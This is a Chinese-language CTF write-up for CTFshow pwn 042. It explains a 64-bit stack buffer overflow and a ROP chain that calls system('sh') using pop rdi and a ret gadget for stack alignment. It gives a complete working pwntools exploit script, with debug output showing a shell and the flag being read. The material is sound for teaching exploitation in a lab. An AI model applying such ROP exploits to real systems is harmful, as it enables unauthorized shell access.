【CTFshow-pwn系列】03_栈溢出【pwn 042】详解:64位下的字符串搜寻与 ROP

📅 发布时间:2026/7/9 11:43:26 👁️ 浏览次数:
【CTFshow-pwn系列】03_栈溢出【pwn 042】详解:64位下的字符串搜寻与 ROP
本文仅用于技术研究禁止用于非法用途。Author:枷锁在前面的关卡中我们分别学习了pwn 04064 位环境下的 ROP利用pop rdi传参调用system(/bin/sh)。pwn 041当没有/bin/sh时寻找sh字符串作为替代。来到PWN 042题目将这两个考点结合在了一起64 位环境 缺少/bin/sh。我们需要综合运用之前的知识完成这道进阶版的拼图。pwn 042 综合演练64位 ROP 拼图升级版题目信息与环境侦察题目描述pwn42: Hint: It has system, but dont have /bin/sh. Find something to replace it!运行一下程序解题过程首先使用checksec检查程序保护情况。Arch:amd64-64-little(64位程序)RELRO:Partial RELROStack:No canary found(无栈哨兵)NX:NX enabled(栈不可执行)PIE:No PIE(地址固定)侦察分析64位架构参数必须通过寄存器RDI传递。NX 开启必须使用 ROP。No PIEGadget 和字符串地址是固定的。第一部分代码审计与漏洞挖掘1. 静态分析 (IDA Pro)Main 函数int __fastcall main(int argc, const char **argv, const char **envp) { setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 2, 0); logo(); puts(Hint: It has system, but dont have /bin/sh...); ctfshow(); // [漏洞点] puts(\nExit); return 0; }漏洞函数 ctfshowssize_t ctfshow() { _BYTE buf[10]; // [rsp6h] [rbp-Ah] BYREF // [漏洞点]read 读取 50 (0x32) 字节 // 50 10存在栈溢出 return read(0, buf, 0x32u); }偏移量计算 根据 IDA 注释[rbp-Ah]buf距离rbp的偏移是0xA(10 字节)。64 位下Old RBP占 8 字节。覆盖返回地址所需长度 10(buf) 8(Old RBP) 18 字节。2. 寻找拼图零件题目提供了两个辅助函数这不仅是提示更是我们的“弹药库”hint 函数__int64 hint() { system(echo flag); // 提供了 system 函数的 PLT 地址 return 0; }useful 函数int useful() { return printf(sh); // 提供了 sh 字符串 }第二部分解题思路与 Payload 构造1. 核心思路我们需要调用system(sh)。 在 64 位下这意味着将字符串sh的地址放入RDI寄存器。调用system函数。注意栈对齐 (Stack Alignment)问题。2. 搜集地址与 Gadgets我们需要的零件清单system 地址elf.sym[system]“sh” 地址next(elf.search(bsh))pop rdi; ret用于将栈上的 “sh” 地址弹入 RDI。ret用于对齐栈防止system中的movaps崩溃。3. Payload 结构解析---------------------- | Padding (18 bytes) | ---------------------- | pop rdi; ret 地址 | -- 覆盖返回地址跳转到这里 ---------------------- | sh 的地址 | -- pop rdi 执行时RDI sh ---------------------- | ret 地址 | -- 空转指令用于栈对齐 ---------------------- | system 的地址 | -- 调用 system(sh) ----------------------第三部分实战操作编写 Python 脚本进行自动化攻击。from pwn import * # 1. 基础配置 context.log_level debug context.arch amd64 # 2. 建立连接 # io process(./pwn) io remote(pwn.challenge.ctf.show, 28183) # 端口根据实际情况修改 # 3. 加载 ELF 文件 elf ELF(./pwn) # 4. 搜集拼图零件 # [零件1] system 函数地址 system_addr elf.plt[system] log.success(fSystem Address: {hex(system_addr)}) # [零件2] sh 字符串地址 # 搜索包含 sh\x00 或者单纯 sh 的地址 try: sh_addr next(elf.search(bsh)) log.success(fsh Address: {hex(sh_addr)}) except StopIteration: log.error(String sh not found!) # [零件3] Gadgets # 使用 ROP 模块自动寻找或者使用 ROPgadget 工具手动查找 # ROPgadget --binary pwn --only pop|ret | grep rdi rop ROP(elf) pop_rdi rop.find_gadget([pop rdi, ret])[0] ret rop.find_gadget([ret])[0] log.success(fpop rdi; ret: {hex(pop_rdi)}) log.success(fret: {hex(ret)}) # 5. 构造 Payload # 偏移量 10 (buf) 8 (rbp) 18 offset 18 payload flat([ ba * offset, # 1. 填充 pop_rdi, # 2. RDI ... sh_addr, # 3. sh 字符串地址 ret, # 4. 栈对齐 (防止 movaps 崩溃) system_addr # 5. system(sh) ]) # 6. 发送 Payload io.sendline(payload) # 7. 获取 Shell io.interactive()运行结果[DEBUG] Sent 0x2a bytes: 00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│ 00000010 61 61 43 08 40 00 00 00 00 00 72 08 40 00 00 00 │aaC·│···│··r·│···│ 00000020 00 00 3e 05 40 00 00 00 00 00 50 05 40 00 00 00 │···│···│··P·│···│ 00000030 00 00 │··│ [*] Switching to interactive mode $ cat /ctfshow_flag ctfshow{...}总结PWN 042 的核心逻辑维度PWN 040 (基础 64位 ROP)PWN 042 (进阶 64位 ROP)目标system(/bin/sh)system(sh)字符串直接给出/bin/sh需搜索shGadgetpop rdi; retpop rdi; ret栈对齐需注意需注意 (添加 ret gadget)核心启示 这道题再次强调了“环境适应性”。架构变了64位我们就用寄存器传参。字符串变了没了/bin/sh我们就搜sh。栈不对齐了Crash我们就加ret。只要掌握了这些基本原理无论题目形式如何变化我们都能找到解题的路径。宇宙级免责声明 重要声明本文仅供合法授权下的安全研究与教育目的 1.合法授权本文所述技术仅适用于已获得明确书面授权的目标或自己的靶场内系统。未经授权的渗透测试、漏洞扫描或暴力破解行为均属违法可能导致法律后果包括但不限于刑事指控、民事诉讼及巨额赔偿。 2.道德约束黑客精神的核心是建设而非破坏。请确保你的行为符合道德规范仅用于提升系统安全性而非恶意入侵、数据窃取或服务干扰。 3.风险自担使用本文所述工具和技术时你需自行承担所有风险。作者及发布平台不对任何滥用、误用或由此引发的法律问题负责。 4.合规性确保你的测试符合当地及国际法律法规如《计算机欺诈与滥用法案》CFAA、《通用数据保护条例》GDPR等。必要时咨询法律顾问。 5.最小影响原则测试过程中应避免对目标系统造成破坏或服务中断。建议在非生产环境或沙箱环境中进行演练。 6.数据保护不得访问、存储或泄露任何未授权的用户数据。如意外获取敏感信息应立即报告相关方并删除。 7.免责范围作者、平台及关联方明确拒绝承担因读者行为导致的任何直接、间接、附带或惩罚性损害责任。 安全研究的正确姿势✅ 先授权再测试✅ 只针对自己拥有或有权测试的系统✅ 发现漏洞后及时报告并协助修复✅ 尊重隐私不越界⚠️ 警告技术无善恶人心有黑白。请明智选择你的道路。